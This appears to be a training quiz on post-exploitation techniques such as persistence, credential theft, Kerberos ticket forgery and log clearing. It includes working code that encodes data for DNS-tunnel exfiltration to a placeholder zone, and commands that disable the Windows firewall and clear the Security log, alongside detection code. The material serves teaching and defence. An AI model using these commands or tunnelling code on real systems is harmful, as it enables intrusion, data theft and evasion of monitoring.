1. What is the primary goal of post-exploitation in a penetration test?
- A) Finding and fixing vulnerabilities
- B) Exploiting multiple systems
- C) Maintaining persistent access and gathering intelligence
- D) Running DoS attacks
✅ Answer: C) Maintaining persistent access and gathering intelligence
Explanation: Post-exploitation is focused on maintaining access, escalating privileges, gathering sensitive data, and determining the value of the compromised system for further actions.
2. Which method is commonly used to maintain persistence on a Windows system?
- A) SSH Tunneling
- B) Backdoored SSH Keys
- C) Creating a registry run key
- D) ICMP Tunneling
✅ Answer: C) Creating a registry run key
Explanation: Attackers add a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (or the HKLM equivalent, which needs administrative rights) so that the payload is launched every time the user logs on. Sysmon Event ID 13 (registry value set) or a diff of the Run and RunOnce keys against a baseline catches it.
3. What is a common persistence mechanism used in Linux environments?
- A) Sticky Keys Attack
- B) Cron Job Execution
- C) DLL Sideloading
- D) ARP Poisoning
✅ Answer: B) Cron Job Execution
Explanation: Attackers add an entry to /etc/crontab, a file under /etc/cron.d, or a user's crontab (edited with crontab -e) so that a script such as a reverse-shell launcher runs at regular intervals; unlike a running process, the entry survives reboots.
4. What is the primary function of Meterpreter’s persistence module?
- A) Encrypting network traffic
- B) Establishing a reverse shell at system startup
- C) Exploiting buffer overflows
- D) Conducting SQL Injection attacks
✅ Answer: B) Establishing a reverse shell at system startup
Explanation: Metasploit’s persistence module (originally the run persistence Meterpreter script, now exploit/windows/local/persistence) installs a payload that connects back to the attacker’s handler each time the system boots or the user logs on, so a handler must be listening for the reconnect.
5. What is the advantage of using a rootkit in post-exploitation?
- A) It allows privilege escalation
- B) It helps evade detection by hiding processes
- C) It can brute-force user passwords
- D) It scans for open ports
✅ Answer: B) It helps evade detection by hiding processes
Explanation: Rootkits can hide malicious processes, files, and network connections, making them difficult to detect using traditional security tools.
6. What is the primary risk of leaving backdoors in a compromised system?
- A) It can be detected by antivirus software
- B) Other attackers may find and exploit it
- C) The system will slow down significantly
- D) The logs will get deleted
✅ Answer: B) Other attackers may find and exploit it
Explanation: An undocumented or weakly protected backdoor can be found and reused by other attackers, turning a controlled test into an unintended compromise. Every backdoor planted during an engagement must be recorded and removed at its end.
7. How does a DNS Tunneling attack help in maintaining access?
- A) It injects malicious JavaScript into DNS packets
- B) It allows data exfiltration through DNS queries
- C) It changes the DNS records on the target machine
- D) It disrupts the domain name resolution process
✅ Answer: B) It allows data exfiltration through DNS queries
Explanation: The client encodes data (commonly base32 or hex) into the subdomain labels of queries for a zone whose authoritative server the attacker runs; the server’s answers carry commands back. It works because most networks allow outbound DNS even when direct internet access is blocked, and it is spotted by unusually long, high-entropy subdomains and abnormal query volume to a single domain.
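As an added example (not part of the original quiz), the mechanism in code: a client-side encoder that packs bytes into query names, the server-side decoder that reassembles them, and the length/entropy check a defender can run over resolver logs. The zone exfil.example and the detection thresholds are assumptions, and no DNS traffic is sent.

```python
"""Added example (not from the original quiz): how a DNS tunnel packs data into
query names, how the attacker's authoritative server reassembles it, and the
length/entropy check a defender can run on resolver logs. The zone
exfil.example is a placeholder and no packets are sent."""
import base64
import math
from collections import Counter

TUNNEL_DOMAIN = "exfil.example"   # assumed attacker-controlled zone
MAX_LABEL = 63                     # RFC 1035 label limit
LABELS_PER_QUERY = 3               # 3 * 63 + overhead stays under the 253-char name limit


def encode_queries(data: bytes) -> list[str]:
    """Client side: base32 the data (DNS is case-insensitive, so base64 is
    unsafe) and split it into numbered query names under the tunnel zone."""
    text = base64.b32encode(data).decode().rstrip("=").lower()
    per_query = MAX_LABEL * LABELS_PER_QUERY
    names = []
    for seq, start in enumerate(range(0, len(text), per_query)):
        piece = text[start:start + per_query]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        # leading sequence label lets the server reorder out-of-order queries
        names.append(".".join([str(seq), *labels, TUNNEL_DOMAIN]))
    return names


def decode_queries(names: list[str]) -> bytes:
    """Server side: strip the zone, order by sequence number, undo base32."""
    pieces = {}
    for name in names:
        labels = name.removesuffix("." + TUNNEL_DOMAIN).split(".")
        pieces[int(labels[0])] = "".join(labels[1:])
    text = "".join(pieces[k] for k in sorted(pieces)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))   # restore padding


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_tunnel(name: str, min_len: int = 50, min_entropy: float = 3.5) -> bool:
    """Defender heuristic for one query: the part below the registrable domain
    is long and close to random. Thresholds are assumptions; tune them against
    your own resolver logs and pair them with per-client query volume."""
    labels = name.rstrip(".").split(".")
    sub = "".join(labels[:-2])
    return len(sub) >= min_len and shannon_entropy(sub) >= min_entropy
```

The encoder keeps every label at 63 characters or less and every name under 253, which is what a real tunnel must do to survive a recursive resolver; the detector looks at exactly those properties from the other side.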
8. Which post-exploitation technique involves manipulating legitimate system processes to execute malicious code?
- A) DLL Injection
- B) SQL Injection
- C) Cross-Site Scripting
- D) Credential Stuffing
✅ Answer: A) DLL Injection
Explanation: DLL Injection involves forcing a legitimate process to load and execute a malicious DLL, often used for stealthy persistence.
9. What tool is commonly used for credential dumping on Windows?
- A) Hydra
- B) Mimikatz
- C) Sqlmap
- D) Nmap
✅ Answer: B) Mimikatz
Explanation: Mimikatz reads credential material out of LSASS memory: NTLM hashes, Kerberos tickets and, where the WDigest provider is enabled, plaintext passwords. It needs SYSTEM or SeDebugPrivilege, and LSA Protection or Credential Guard blocks it.
10. What is the main purpose of privilege escalation in post-exploitation?
- A) Crashing the system
- B) Gaining higher-level access for executing more powerful commands
- C) Flooding the network with requests
- D) Running a virus scanner
✅ Answer: B) Gaining higher-level access for executing more powerful commands
Explanation: Privilege escalation allows attackers to gain admin/system/root access, enabling deeper system control.
11. Which file can an attacker modify to maintain SSH persistence on a Linux system?
- A) /etc/hosts
- B) ~/.ssh/authorized_keys
- C) /etc/passwd
- D) /etc/sudoers
✅ Answer: B) ~/.ssh/authorized_keys
Explanation: Attackers append their own public key to ~/.ssh/authorized_keys so they can log in over SSH without a password; the file belongs to the user, so no root access is needed, and the key survives password changes.
12. What is the main reason attackers use PowerShell scripts in post-exploitation?
- A) It is slow and inefficient
- B) It is commonly blocked by Windows Defender
- C) It allows fileless attacks and avoids AV detection
- D) It only runs on Linux
✅ Answer: C) It allows fileless attacks and avoids AV detection
Explanation: PowerShell can download and run a payload entirely in memory, so no file is written for file-based antivirus to scan. The defence side has caught up: AMSI scans script content at run time, script block logging records it, and Constrained Language Mode limits what it can do.
13. What is Lateral Movement in post-exploitation?
- A) Moving laterally between physical networks
- B) Accessing and compromising additional systems within the network
- C) Sending phishing emails
- D) Brute-forcing passwords
✅ Answer: B) Accessing and compromising additional systems within the network
Explanation: Attackers use Lateral Movement to spread through the network, often using stolen credentials.
14. What is the primary function of Kerberoasting?
- A) Exploiting a vulnerable SSH service
- B) Cracking Kerberos service tickets to extract plaintext passwords
- C) Deploying ransomware on a domain controller
- D) Hijacking user sessions
✅ Answer: B) Cracking Kerberos service tickets to extract plaintext passwords
Explanation: Any domain user can request a TGS ticket for a service principal name (SPN); part of that ticket is encrypted with the service account’s password-derived key, so it can be cracked offline (hashcat mode 13100) if the password is weak. Long random service-account passwords, or group Managed Service Accounts, remove the weakness.
15. What is the purpose of using a Web Shell in maintaining access?
- A) To disable firewall protections
- B) To allow remote command execution via a web interface
- C) To brute-force user credentials
- D) To inject SQL queries into a database
✅ Answer: B) To allow remote command execution via a web interface
Explanation: Web Shells (e.g., China Chopper) allow attackers to execute commands on a compromised web server.
16. Which of the following tools is commonly used for post-exploitation activities such as pivoting and lateral movement?
- A) Nessus
- B) Cobalt Strike
- C) Wireshark
- D) Nikto
✅ Answer: B) Cobalt Strike
Explanation: Cobalt Strike provides post-exploitation tools such as pivoting, privilege escalation, and beacon communication, making it popular among both pentesters and adversaries.
17. What is the purpose of “Golden Ticket” attacks in post-exploitation?
- A) Creating a fake Active Directory domain
- B) Gaining long-term domain admin access using forged Kerberos tickets
- C) Encrypting network traffic
- D) Sending phishing emails
✅ Answer: B) Gaining long-term domain admin access using forged Kerberos tickets
Explanation: A Golden Ticket is a TGT forged with the krbtgt account’s hash, which lets the attacker mint tickets for any user, including domain admins, without the domain controller ever authenticating them. It stays valid until the krbtgt password is changed twice.
18. What is the advantage of using a reverse shell in post-exploitation?
- A) The attacker’s IP remains hidden
- B) The target system initiates the connection, bypassing firewalls
- C) It cannot be detected by antivirus
- D) It is the fastest method of privilege escalation
✅ Answer: B) The target system initiates the connection, bypassing firewalls
Explanation: Reverse shells work by having the compromised system connect back to the attacker, evading inbound firewall restrictions.
19. What type of malware is designed to provide long-term access and evade detection on a system?
- A) Worm
- B) Rootkit
- C) Ransomware
- D) Keylogger
✅ Answer: B) Rootkit
Explanation: Rootkits hide their own processes, files and network connections from the operating system and its security tools. Kernel-mode rootkits hook or patch the kernel; user-mode rootkits hook API calls inside user processes. Both aim at keeping access for a long time rather than at spreading.
20. Which Windows feature can be abused for persistent access via scheduled task execution?
- A) Task Manager
- B) Windows Defender
- C) Task Scheduler
- D) Registry Editor
✅ Answer: C) Task Scheduler
Explanation: Attackers use schtasks.exe to register a task that runs a script or payload at boot, at user logon or on a fixed schedule. New tasks appear as XML files under C:\Windows\System32\Tasks and as Event ID 4698 in the Security log when task auditing is enabled.
21. What attack technique involves reusing an existing authenticated session token to gain unauthorized access?
- A) Token Hijacking
- B) ARP Spoofing
- C) SQL Injection
- D) DNS Spoofing
✅ Answer: A) Token Hijacking
Explanation: Token Hijacking allows an attacker to reuse a stolen session token for unauthorized access.
22. What does the Sticky Keys attack exploit?
- A) Command execution by replacing accessibility executables
- B) SQL Injection in authentication fields
- C) Buffer overflow in Windows
- D) Network traffic manipulation
✅ Answer: A) Command execution by replacing accessibility executables
Explanation: Attackers replace the Sticky Keys binary (sethc.exe) with cmd.exe or another shell; pressing Shift five times at the logon screen then spawns a shell running as SYSTEM before anyone authenticates. Doing the replacement requires administrative or offline disk access.
23. What is the function of an attacker-controlled Command & Control (C2) server in post-exploitation?
- A) Encrypting compromised data
- B) Sending commands and receiving data from infected machines
- C) Disabling security software
- D) Running phishing campaigns
✅ Answer: B) Sending commands and receiving data from infected machines
Explanation: C2 servers allow attackers to remotely control compromised hosts, exfiltrate data, and execute commands.
24. How does a “Pass-the-Hash” attack work?
- A) Cracking hashed passwords to plaintext
- B) Using stolen password hashes to authenticate without cracking them
- C) Exploiting weak hashing algorithms
- D) Injecting malicious hashes into a database
✅ Answer: B) Using stolen password hashes to authenticate without cracking them
Explanation: Pass-the-Hash reuses an NTLM (or, on very old systems, LM) hash to authenticate without knowing the plaintext password. It works because the NTLM challenge-response is computed from the hash itself, so possession of the hash is possession of the credential.
25. Which of the following can be used to execute malicious code without dropping files on disk?
- A) Process Hollowing
- B) Brute Force Attack
- C) Directory Traversal
- D) SQL Injection
✅ Answer: A) Process Hollowing
Explanation: Process Hollowing starts a legitimate executable in a suspended state, unmaps its image from memory, writes the malicious code in its place and resumes the thread, so the payload runs under a trusted process name without a malicious file on disk.
26. What is a “Silver Ticket” attack used for?
- A) Exploiting SQL servers
- B) Gaining access to specific Kerberos service tickets
- C) Conducting phishing campaigns
- D) Bypassing multi-factor authentication
✅ Answer: B) Gaining access to specific Kerberos service tickets
Explanation: A Silver Ticket is a TGS ticket forged with the hash of the service account (often a computer account), so it grants access to that single service without the domain controller ever seeing a request.
27. What is a key feature of an obfuscated payload in post-exploitation?
- A) It is impossible to detect
- B) It is encrypted to avoid detection
- C) It causes immediate system crashes
- D) It requires user interaction to execute
✅ Answer: B) It is encrypted to avoid detection
Explanation: Obfuscation encodes or encrypts the payload so that signature-based scanners do not recognise it, then decodes it at run time; it does not make the payload undetectable, since behaviour-based and in-memory detection still see the decoded code.
28. What is an effective method to establish long-term persistence on a compromised web server?
- A) Editing /etc/hosts
- B) Deploying a web shell
- C) Modifying the ARP table
- D) Using Wireshark
✅ Answer: B) Deploying a web shell
Explanation: Attackers often use web shells (e.g., c99.php) to maintain remote access.
29. What post-exploitation tool is specifically designed to bypass UAC (User Account Control) in Windows?
- A) WinPeas
- B) UACMe
- C) Hydra
- D) sqlmap
✅ Answer: B) UACMe
Explanation: UACMe is a collection of known UAC bypass techniques (auto-elevating binaries, elevated COM interfaces, registry hijacks) that takes a medium-integrity process in the Administrators group to high integrity without a prompt. It is not a true privilege escalation: the user must already be a local administrator.
30. Which file stores local user password hashes on a Windows system?
- A) /etc/passwd
- B) SAM
- C) NetNTLM.dat
- D) NTDS.dit
✅ Answer: B) SAM
Explanation: The Security Account Manager (SAM) hive, stored at C:\Windows\System32\config\SAM, holds the NT hashes of local accounts. The hashes are encrypted with a key derived from the SYSTEM hive, so both hives (or a dump of both) are needed to recover them.
31. What persistence method involves replacing legitimate Windows services with a malicious binary?
- A) DLL Injection
- B) Service Hijacking
- C) Command Injection
- D) Keylogging
✅ Answer: B) Service Hijacking
Explanation: Attackers modify service executables or configurations to launch backdoors at startup.
32. What does the term “living off the land” (LOTL) refer to in post-exploitation?
- A) Using built-in system tools for attacks
- B) Running payloads in remote locations
- C) Using Tor for anonymity
- D) Running malware on a compromised system
✅ Answer: A) Using built-in system tools for attacks
Explanation: LOTL attacks leverage native tools (e.g., PowerShell, WMI, PsExec) to avoid detection.
33. What is the primary purpose of a bind shell in post-exploitation?
- A) To initiate a connection back to the attacker
- B) To listen for incoming connections from an attacker
- C) To execute malware on the target system
- D) To modify firewall rules
✅ Answer: B) To listen for incoming connections from an attacker
Explanation: A bind shell opens a port on the compromised machine and waits for an attacker to connect.
34. Which Windows feature allows attackers to execute scripts in-memory, avoiding disk-based detection?
- A) Group Policy
- B) Windows Script Host (WSH)
- C) Active Directory
- D) Registry Editor
✅ Answer: B) Windows Script Host (WSH)
Explanation: WSH (wscript.exe and cscript.exe) runs .vbs, .js and .wsf scripts under signed Microsoft binaries. The script file is typically a small loader and the stage it fetches is executed in memory, which is why WSH shows up in fileless chains. Strictly speaking, the loader script itself does touch disk; the fileless part is the stage it fetches.
35. What is the purpose of a keylogger in post-exploitation?
- A) Logging all system errors
- B) Capturing and recording keystrokes
- C) Modifying system logs
- D) Preventing brute-force attacks
✅ Answer: B) Capturing and recording keystrokes
Explanation: Keyloggers record user input, allowing attackers to steal passwords and other sensitive data.
36. Which attack technique exploits scheduled tasks to maintain persistence on a Windows system?
- A) Registry Injection
- B) Task Hijacking
- C) DDE Exploitation
- D) Pass-the-Ticket
✅ Answer: B) Task Hijacking
Explanation: Attackers modify scheduled tasks to run malicious commands at predefined times.
37. What is the purpose of disabling security software in post-exploitation?
- A) To avoid detection and maintain access
- B) To improve system performance
- C) To install legitimate software
- D) To prevent system crashes
✅ Answer: A) To avoid detection and maintain access
Explanation: Attackers often disable antivirus, firewalls, and logging mechanisms to remain undetected.
38. Which command in Windows is used to enumerate active user sessions?
- A) net use
- B) query user
- C) arp -a
- D) tracert
✅ Answer: B) query user
Explanation: The query user command (also available as quser) lists logged-in users, their session IDs and idle times on a Windows system.
39. What does netsh advfirewall set allprofiles state off do on a Windows system?
- A) Enables the firewall for all profiles
- B) Disables the firewall for all profiles
- C) Creates a new firewall rule
- D) Logs all firewall activity
✅ Answer: B) Disables the firewall for all profiles
Explanation: This command turns the Windows firewall off for the domain, private and public profiles at once. It needs an elevated prompt, and a state change on all profiles is a strong detection signal.
40. What persistence technique abuses Windows Management Instrumentation (WMI)?
- A) WMI Event Subscription
- B) WMI Packet Injection
- C) WMI Buffer Overflow
- D) WMI Reverse Shell
✅ Answer: A) WMI Event Subscription
Explanation: A permanent WMI event subscription pairs an __EventFilter (for example, a timer or a system-startup event) with a CommandLineEventConsumer or ActiveScriptEventConsumer through a __FilterToConsumerBinding. The payload runs as SYSTEM whenever the event fires, nothing needs to sit in the file system, and Sysmon Event IDs 19 to 21 record the three objects being created.
41. What is the purpose of using net use \\target\C$ /user:Administrator in post-exploitation?
- A) Creating a new user
- B) Mapping a hidden administrative share
- C) Modifying system logs
- D) Encrypting system files
✅ Answer: B) Mapping a hidden administrative share
Explanation: The C$ administrative share provides remote access to the C:\ drive on Windows systems.
42. What does the persistence module in Metasploit do?
- A) Hides the attacker’s presence
- B) Ensures a backdoor runs after reboot
- C) Deletes system logs
- D) Blocks antivirus detection
✅ Answer: B) Ensures a backdoor runs after reboot
Explanation: The persistence module creates registry keys or scheduled tasks to maintain access.
43. What is the primary purpose of using wevtutil in post-exploitation?
- A) Modifying Windows registry
- B) Dumping or clearing event logs
- C) Creating new user accounts
- D) Executing remote code
✅ Answer: B) Dumping or clearing event logs
Explanation: wevtutil can query, export and clear Windows event logs (wevtutil cl Security empties the Security log). Attackers clear logs to remove traces, but clearing is itself recorded as Event ID 1102, and logs already forwarded to a collector are unaffected.
44. How does an attacker use DLL Sideloading to maintain access?
- A) By modifying system registry entries
- B) By replacing legitimate DLLs with malicious ones
- C) By modifying network configurations
- D) By creating new user accounts
✅ Answer: B) By replacing legitimate DLLs with malicious ones
Explanation: DLL Sideloading places a malicious DLL next to a legitimate, often signed, executable that loads a DLL of that name from its own directory; the code then runs under the trusted program’s identity. Overwriting a system DLL in place is the cruder variant and is more likely to break the host and to be caught by file-integrity checks.
45. What method allows attackers to execute code with SYSTEM privileges?
- A) Kerberoasting
- B) Token Impersonation
- C) ARP Spoofing
- D) Cross-Site Scripting
✅ Answer: B) Token Impersonation
Explanation: Token Impersonation allows attackers to steal high-privilege tokens, executing commands as SYSTEM.
46. What command in Linux is commonly used to escalate privileges?
- A) whoami
- B) sudo -i
- C) ifconfig
- D) ls -la
✅ Answer: B) sudo -i
Explanation: sudo -i opens a root login shell, but only for users whose sudoers rules allow it. When it does not, attackers enumerate permissive sudo rules (sudo -l), SUID binaries and writable cron or service files instead.
47. Which technique involves modifying system binaries to execute malware?
- A) Binary Padding
- B) Binary Hijacking
- C) Kernel Injection
- D) Phishing
✅ Answer: B) Binary Hijacking
Explanation: Binary Hijacking replaces system binaries with malicious versions.
48. What is the function of the schtasks command in Windows?
- A) Disables the firewall
- B) Creates scheduled tasks
- C) Dumps memory contents
- D) Modifies Active Directory policies
✅ Answer: B) Creates scheduled tasks
Explanation: schtasks is used to create, query, modify and delete scheduled tasks, which makes it a standard persistence tool.
49. How does a “Doppelganging” attack evade security detection?
- A) By modifying system logs
- B) By injecting malicious code into processes without writing to disk
- C) By hiding in encrypted files
- D) By disabling antivirus
✅ Answer: B) By injecting malicious code into processes without writing to disk
Explanation: Process Doppelgänging writes the payload into an NTFS transaction, creates a process from the transacted file’s image section and then rolls the transaction back, so the malicious executable never exists on disk for a scanner to see while the process keeps running.
50. What tool is commonly used to exploit misconfigured SMB shares?
- A) Responder
- B) John the Ripper
- C) Empire
- D) CrackMapExec
✅ Answer: D) CrackMapExec
Explanation: CrackMapExec is used for SMB enumeration and exploitation.
51. What is the primary advantage of using PowerShell Empire in post-exploitation?
- A) It automates SQL Injection attacks
- B) It provides a framework for fileless attacks
- C) It is used for network scanning
- D) It encrypts stolen data
✅ Answer: B) It provides a framework for fileless attacks
Explanation: PowerShell Empire enables fileless persistence, executing payloads directly in memory to bypass AV detection.
52. What is the purpose of a Golden SAML attack?
- A) Bypassing Active Directory authentication using forged SAML assertions
- B) Extracting SAML tokens from encrypted databases
- C) Exploiting vulnerabilities in LDAP authentication
- D) Cracking NTLM hashes
✅ Answer: A) Bypassing Active Directory authentication using forged SAML assertions
Explanation: Golden SAML attacks use a stolen AD FS token-signing certificate to forge SAML responses, so the attacker can impersonate any user to services that trust that identity provider (Microsoft 365, for instance) without touching a domain controller or passing MFA. Rotating the token-signing certificate is the only way to invalidate forged assertions.
53. Which protocol is commonly exploited for Lateral Movement in a Windows domain environment?
- A) FTP
- B) RDP
- C) SMTP
- D) SNMP
✅ Answer: B) RDP
Explanation: Attackers use Remote Desktop Protocol (RDP) for moving between systems within a Windows domain.
54. What is the function of rundll32.exe in post-exploitation?
- A) Encrypting files
- B) Loading and executing DLL files
- C) Deleting system logs
- D) Establishing persistence via SSH
✅ Answer: B) Loading and executing DLL files
Explanation: Attackers use rundll32.exe to execute malicious DLLs while evading security software.
55. What does the secedit command do in Windows post-exploitation?
- A) Modifies security policies
- B) Extracts password hashes
- C) Terminates active user sessions
- D) Alters Active Directory objects
✅ Answer: A) Modifies security policies
Explanation: Attackers can use secedit to export and re-import the local security policy, often to weaken audit or password settings and disable defenses.
56. What is an effective way to maintain persistence on macOS?
- A) Modifying Windows registry
- B) Using Launch Agents and Launch Daemons
- C) Running Mimikatz
- D) Injecting PowerShell scripts
✅ Answer: B) Using Launch Agents and Launch Daemons
Explanation: Launch Agents (~/Library/LaunchAgents, per user, no root needed) and Launch Daemons (/Library/LaunchDaemons, run as root at boot) are plist files that launchd starts automatically, which makes them the standard macOS persistence locations.
57. What is a “Ghost User” in post-exploitation?
- A) A deleted user account that still has access
- B) A hidden administrator account
- C) A user that is invisible in logs but active
- D) A decoy user account for distraction
✅ Answer: B) A hidden administrator account
Explanation: Attackers create “ghost users” by modifying user attributes to maintain access without detection.
58. What is the purpose of wmic in post-exploitation?
- A) Gathering system information and executing remote commands
- B) Modifying NTFS permissions
- C) Encrypting files before exfiltration
- D) Running SQL queries on the target machine
✅ Answer: A) Gathering system information and executing remote commands
Explanation: WMIC (Windows Management Instrumentation Command-line) allows system enumeration, remote process creation and process manipulation. It is deprecated and missing from some recent Windows builds, where the same WMI classes are reached through PowerShell.
59. What does the reg add command do in Windows?
- A) Creates new user accounts
- B) Adds new registry entries for persistence
- C) Modifies Active Directory users
- D) Kills running processes
✅ Answer: B) Adds new registry entries for persistence
Explanation: Attackers use reg add to modify the Windows Registry for maintaining access or executing payloads.
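An added example, not from the quiz, that turns questions 2, 20, 48 and 59 into a check a defender can run: parse reg query output for the Run key and score each autorun command. The registry dump is constructed and the scoring thresholds are assumptions; the same classify_command() can be pointed at the actions listed by schtasks /query /v.

```python
"""Added example, not from the original quiz: auditing Run-key persistence from
'reg query' output. The dump below is constructed; in practice feed it the
output of  reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
(plus the HKLM key, RunOnce, and the actions from schtasks /query /v, which
classify_command() scores the same way)."""
import re

SAMPLE_REG_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Updater    REG_SZ    powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
    Helper    REG_SZ    C:\Users\Public\svchost.exe
"""

REG_LINE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_(?:EXPAND_)?SZ)\s+(?P<value>.*)$")
SCRIPT_HOSTS = ("powershell", "pwsh", "wscript", "cscript", "mshta", "rundll32",
                "regsvr32", "cmd", "certutil", "msbuild")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe", "dllhost.exe"}
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden|frombase64string")


def parse_reg_query(text: str) -> list[tuple[str, str, str]]:
    """Return (key, value name, data) triples from reg query output."""
    entries, key = [], None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        elif key and (m := REG_LINE.match(line)):
            entries.append((key, m["name"], m["value"].strip()))
    return entries


def classify_command(command: str) -> tuple[int, list[str]]:
    """Score one autorun command; the weights are assumptions, not a standard."""
    low = command.lower()
    head = low.split()[0].strip('"') if low.split() else ""
    exe = head.rsplit("\\", 1)[-1]
    score, reasons = 0, []
    if exe.startswith(SCRIPT_HOSTS):
        score += 2; reasons.append("script host or LOLBin as the autorun target")
    if ENCODED_PS.search(low):
        score += 3; reasons.append("encoded or hidden-window PowerShell")
    if any(d in low for d in USER_WRITABLE):
        score += 1; reasons.append("target lives in a user-writable directory")
    if exe in SYSTEM_NAMES and "\\windows\\" not in head:
        score += 3; reasons.append("system binary name outside C:\\Windows")
    return score, reasons


def audit_run_keys(reg_output: str, threshold: int = 2) -> list[dict]:
    """Entries at or above the threshold, in the order the key lists them."""
    findings = []
    for key, name, value in parse_reg_query(reg_output):
        score, reasons = classify_command(value)
        if score >= threshold:
            findings.append({"key": key, "name": name, "command": value,
                             "score": score, "reasons": reasons})
    return findings
```

On the sample the legitimate OneDrive entry scores 1 (it lives under AppData, as many real programs do) and stays below the threshold, while the encoded PowerShell loader and the svchost.exe copy in C:\Users\Public score 5 and 4. The weights deliberately rate a masquerading system binary and encoded PowerShell higher than a mere user-writable path, because that path alone is how most legitimate per-user software is installed.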
60. Which protocol is commonly used for tunneling attacks to bypass security restrictions?
- A) UDP
- B) SSH
- C) ICMP
- D) SMTP
✅ Answer: C) ICMP
Explanation: ICMP tunneling allows attackers to send malicious data within ICMP packets, evading detection.
61. What attack involves manipulating Windows Authentication Packages to steal credentials?
- A) Skeleton Key Attack
- B) Credential Stuffing
- C) Kerberoasting
- D) NTLM Relay Attack
✅ Answer: A) Skeleton Key Attack
Explanation: Skeleton Key malware patches the LSASS process on a domain controller so that a master password is accepted for every domain account alongside the real one. It requires domain admin rights, lives only in memory, and disappears when the DC reboots.
62. What method is commonly used to maintain access on cloud environments like AWS?
- A) Deploying a web shell
- B) Creating hidden IAM users and access keys
- C) Using Mimikatz
- D) Encrypting network traffic
✅ Answer: B) Creating hidden IAM users and access keys
Explanation: Attackers keep AWS access by creating additional IAM users or access keys, attaching broad policies, or adding themselves to a role’s trust policy. CloudTrail events such as CreateUser, CreateAccessKey and UpdateAssumeRolePolicy are the detection hooks.
63. What does a “Domain Fronting” attack accomplish?
- A) Conceals malicious traffic within legitimate domains
- B) Executes SQL Injection against domains
- C) Creates hidden subdomains for phishing
- D) Allows DNS cache poisoning
✅ Answer: A) Conceals malicious traffic within legitimate domains
Explanation: Domain Fronting puts a benign hostname in DNS and the TLS SNI while the HTTP Host header names the attacker’s backend on the same CDN, so C2 traffic looks like a session with a trusted site. Most large CDNs now reject requests whose SNI and Host header do not match.
64. Which service is commonly exploited for gaining persistence via Windows Services?
- A) svchost.exe
- B) winlogon.exe
- C) lsass.exe
- D) explorer.exe
✅ Answer: A) svchost.exe
Explanation: svchost.exe hosts Windows services, and attackers often use service hijacking for persistence.
65. What is an example of an attack using Alternate Data Streams (ADS) in NTFS?
- A) Hiding malware within a legitimate file without changing its size
- B) Injecting malicious SQL queries
- C) Conducting brute-force attacks
- D) Manipulating Active Directory
✅ Answer: A) Hiding malware within a legitimate file without changing its size
Explanation: ADS in NTFS allows malware to hide inside legitimate files without modifying file properties.
66. What is the purpose of “Living off the Land Binaries and Scripts” (LOLBAS)?
- A) Using built-in system tools to evade detection
- B) Encrypting all stolen data
- C) Running privilege escalation exploits
- D) Creating botnets
✅ Answer: A) Using built-in system tools to evade detection
Explanation: LOLBAS attacks use trusted system binaries (e.g., mshta, regsvr32) to execute malicious code without detection.
67. What is the purpose of an attacker modifying the hosts file (C:\Windows\System32\drivers\etc\hosts)?
- A) Redirecting domain requests to malicious servers
- B) Modifying system logs
- C) Extracting password hashes
- D) Disabling security updates
✅ Answer: A) Redirecting domain requests to malicious servers
Explanation: Attackers modify the hosts file to redirect traffic to fake login pages.
68. Which of the following allows for long-term persistence by modifying user authentication tokens?
- A) Pass-the-Hash
- B) Pass-the-Ticket
- C) Lateral Movement
- D) Heap Spraying
✅ Answer: B) Pass-the-Ticket
Explanation: Pass-the-Ticket reuses Kerberos tickets (a TGT or service tickets) stolen from another session’s memory. A stolen TGT expires (10 hours by default, renewable for 7 days), so truly long-term access usually comes from forged Golden or Silver Tickets rather than from stolen ones.
69. What is a key characteristic of a fileless malware attack?
- A) It resides entirely in memory without writing to disk
- B) It requires user interaction to execute
- C) It can only infect Linux systems
- D) It modifies system boot settings
✅ Answer: A) It resides entirely in memory without writing to disk
Explanation: Fileless malware executes directly in memory, bypassing traditional antivirus solutions.
70. Which of the following Windows event logs is most useful for tracking unauthorized user logins?
- A) System Log
- B) Security Log
- C) Application Log
- D) Setup Log
✅ Answer: B) Security Log
Explanation: The Security Log records logon activity: 4624 (successful logon, with the logon type), 4625 (failed logon) and, on domain controllers, 4768 (Kerberos TGT requested) and 4769 (service ticket requested). Clearing the log produces Event ID 1102.
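An added example (not part of the quiz) running two detections over these event IDs on constructed records: a source that fails many logons and then succeeds (4625 followed by 4624, tagged as a spray when the failures span several accounts), and 4769 service-ticket requests with RC4 encryption type 0x17 for a non-krbtgt SPN, the usual Kerberoasting signal from question 14. The events, thresholds and time window are assumptions.

```python
"""Added example, not from the original quiz: two detections over Security log
events, run here on constructed records (a SIEM would supply the same fields
from EventData). Flags a source that fails many logons then succeeds
(4625 -> 4624, with a spray marker when the failures span many accounts) and
RC4-encrypted service ticket requests (4769 with etype 0x17), the classic
Kerberoasting tell."""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [  # constructed telemetry, not from a real host
    {"time": "2024-05-01T08:00:01", "id": 4624, "user": "alice", "src": "10.0.0.5", "logon_type": 2},
    {"time": "2024-05-01T08:05:00", "id": 4625, "user": "bob", "src": "10.0.0.99", "logon_type": 3},
    {"time": "2024-05-01T08:05:02", "id": 4625, "user": "carol", "src": "10.0.0.99", "logon_type": 3},
    {"time": "2024-05-01T08:05:04", "id": 4625, "user": "dave", "src": "10.0.0.99", "logon_type": 3},
    {"time": "2024-05-01T08:05:06", "id": 4625, "user": "erin", "src": "10.0.0.99", "logon_type": 3},
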